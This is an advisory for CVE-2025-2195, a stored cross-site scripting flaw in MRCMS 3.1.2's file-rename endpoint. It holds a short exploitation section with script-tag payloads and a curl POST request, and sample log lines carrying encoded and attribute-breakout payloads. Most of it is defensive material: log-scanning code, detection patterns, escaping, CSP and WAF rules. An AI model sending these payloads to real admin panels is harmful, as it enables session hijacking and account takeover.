MRCMS, Cross-Site Scripting (XSS), CVE-2025-2195 (Medium)

How CVE-2025-2195 Works

The vulnerability exists in MRCMS 3.1.2 within the file /admin/file/rename.do, specifically in the `rename` function of org.marker.mushroom.controller.FileController. Attackers can inject malicious scripts via the `name` or `path` parameters due to improper input sanitization. When an admin views or interacts with manipulated filenames or paths, the script executes in their browser, leading to session hijacking, data theft, or admin account compromise. The attack is remotely exploitable with low privileges, requiring only user interaction (e.g., browsing files).

DailyCVE Form

Platform: MRCMS
Version: 3.1.2
Vulnerability: XSS
Severity: Medium
Date: 04/09/2025

What Undercode Says:

Exploitation:

1. Craft a malicious filename or path with XSS payload:

<script>alert(document.cookie)</script>

2. Send a POST request to `/admin/file/rename.do`:

curl -X POST -d "name=<script>alert(1)</script>&path=malicious" http://target/admin/file/rename.do

3. Trigger execution when admin views the file list.

Detection:

Check logs for suspicious filenames:

grep -r "rename.do" /var/log/mrcms | grep -i "<script>"
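The grep above only catches a literal, lower-case `<script>`; a payload that is URL-encoded, mixed-case, or uses an event handler attribute instead of a script tag passes it untouched. The following Python scanner is an added example (not part of the advisory or of MRCMS): it pulls `rename.do` requests out of access-log lines, URL-decodes the `name` and `path` parameters (bounded, so double encoding is normalised too), and flags the common XSS markers case-insensitively. The log format, the log location and the presence of the parameters in the logged request line are assumptions; the sample lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample log lines in a generic access-log style. The real MRCMS log
# format and location are assumptions; adapt REQUEST_RE to what your server writes.
# For illustration the rename parameters appear in the logged query string; a server
# that logs only the request line will not show body parameters of a POST.
SAMPLE_LOG = """\
10.0.0.5 - admin [09/Apr/2025:10:01:12 +0000] "POST /admin/file/rename.do?name=report.txt&path=docs HTTP/1.1" 200 512
10.0.0.5 - admin [09/Apr/2025:10:02:30 +0000] "POST /admin/file/rename.do?name=<script>alert(1)</script>&path=docs HTTP/1.1" 200 512
10.0.0.9 - admin [09/Apr/2025:10:03:44 +0000] "POST /admin/file/rename.do?name=%3CsCrIpT%3Ealert%28document.cookie%29%3C%2Fscript%3E&path=%2Fuploads HTTP/1.1" 200 512
10.0.0.9 - admin [09/Apr/2025:10:04:01 +0000] "POST /admin/file/rename.do?name=pic.jpg&path=%22%20onmouseover%3Dalert%281%29%20x%3D%22 HTTP/1.1" 200 512
10.0.0.7 - - [09/Apr/2025:10:05:15 +0000] "GET /index.do HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Markers are matched after URL-decoding and case-folding, so %3CsCrIpT%3E is caught.
XSS_MARKERS = [
    ("script_tag", re.compile(r"<\s*script", re.I)),
    ("javascript_uri", re.compile(r"javascript\s*:", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("markup_tag", re.compile(r"<\s*(img|svg|iframe|object|embed)\b", re.I)),
]


def deep_decode(value, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads are normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_rename_requests(log_text):
    """Return findings for rename.do requests whose name/path carry XSS markers."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m or "/admin/file/rename.do" not in m.group("target"):
            continue
        query = m.group("target").partition("?")[2]
        # parse_qs decodes one layer; deep_decode handles nested encoding on top.
        params = parse_qs(query, keep_blank_values=True)
        for param in ("name", "path"):
            for raw in params.get(param, []):
                value = deep_decode(raw)
                hits = [label for label, rx in XSS_MARKERS if rx.search(value)]
                if hits:
                    findings.append({"line": lineno, "param": param,
                                     "value": value, "markers": hits})
    return findings


if __name__ == "__main__":
    for f in scan_rename_requests(SAMPLE_LOG):
        print(f"line {f['line']}: {f['param']}={f['value']!r} -> {', '.join(f['markers'])}")
```

Run against the constructed sample, the scanner reports lines 2, 3 and 4: the literal tag, the percent-encoded mixed-case tag, and the attribute-breakout payload in `path`, none of which the plain grep would report in full. Legitimate filenames that happen to start with "on" followed by "=" will false-positive on the event-handler marker; tune the list to your file naming rules.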

Mitigation:

1. Patch by sanitizing inputs in `FileController`:

String sanitizedName = StringEscapeUtils.escapeHtml4(name);

2. Implement CSP headers:

add_header Content-Security-Policy "default-src 'self'";

3. WAF rule to block XSS patterns:

SecRule ARGS "@contains <script>" "id:1001,deny,status:403"
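Escaping alone (step 1) fixes the rendering, but a filename that contains angle brackets or quotes has no business being accepted in the first place. The following added example (Python standing in for the Java controller; not MRCMS code) pairs an allowlist validation of `name` and `path` with context-aware output encoding in the file list, and shows the vulnerable concatenation next to the hardened version. The allowlist rules, the row markup and the `list.do` link target are assumptions made for the example.

```python
import html
import re
from urllib.parse import quote

# Allowlist for a renamed file: letters, digits, dot, dash, underscore, space.
# Angle brackets, quotes and path separators are rejected outright. These rules are
# a hardening assumption for this example, not MRCMS's own validation.
SAFE_NAME_RE = re.compile(r"[A-Za-z0-9._ -]{1,128}")
SAFE_PATH_RE = re.compile(r"[A-Za-z0-9._ /-]{1,256}")


def validate_rename(name, path):
    """Raise ValueError unless both parameters are within the allowlist and traversal-free."""
    if not SAFE_NAME_RE.fullmatch(name) or ".." in name:
        raise ValueError(f"rejected filename: {name!r}")
    if not SAFE_PATH_RE.fullmatch(path) or ".." in path.split("/"):
        raise ValueError(f"rejected path: {path!r}")
    return name, path


def render_file_row_vulnerable(name, path):
    # Mirrors the flaw: untrusted values concatenated straight into the admin's HTML.
    return f'<tr><td>{name}</td><td><a href="/admin/file/list.do?path={path}">open</a></td></tr>'


def render_file_row_safe(name, path):
    # Context-aware output encoding: the HTML text context gets html.escape (the Python
    # analog of StringEscapeUtils.escapeHtml4); the URL inside href is percent-encoded
    # first, then HTML-escaped for the attribute context.
    safe_name = html.escape(name, quote=True)
    safe_href = html.escape("/admin/file/list.do?path=" + quote(path, safe="/"), quote=True)
    return f'<tr><td>{safe_name}</td><td><a href="{safe_href}">open</a></td></tr>'


def handle_rename(name, path):
    """Defence in depth: validate on input, encode on output. Returns the safe HTML row."""
    validate_rename(name, path)
    return render_file_row_safe(name, path)


if __name__ == "__main__":
    payload = "<script>alert(document.cookie)</script>"  # constructed test value
    print(render_file_row_vulnerable(payload, "docs"))
    print(render_file_row_safe(payload, "docs"))
    try:
        handle_rename(payload, "docs")
    except ValueError as err:
        print("rejected at input:", err)
```

Validation and encoding are independent layers: the encoder neutralises whatever the validator lets through (including the attribute-breakout case `" onmouseover=...` in `path`), and the validator keeps hostile names out of the filesystem and out of any other consumer that renders them, such as a log viewer or a backup listing. The CSP from step 2 then limits the damage if a third rendering path is missed.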

Impact:

  • Session hijacking
  • Unauthorized admin actions
  • Data exfiltration

Affected Configurations:

  • MRCMS 3.1.2 with default `/admin` access.

Notes:

  • Vendor unresponsive; use community patches.
  • Prioritize patching in shared hosting.

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2195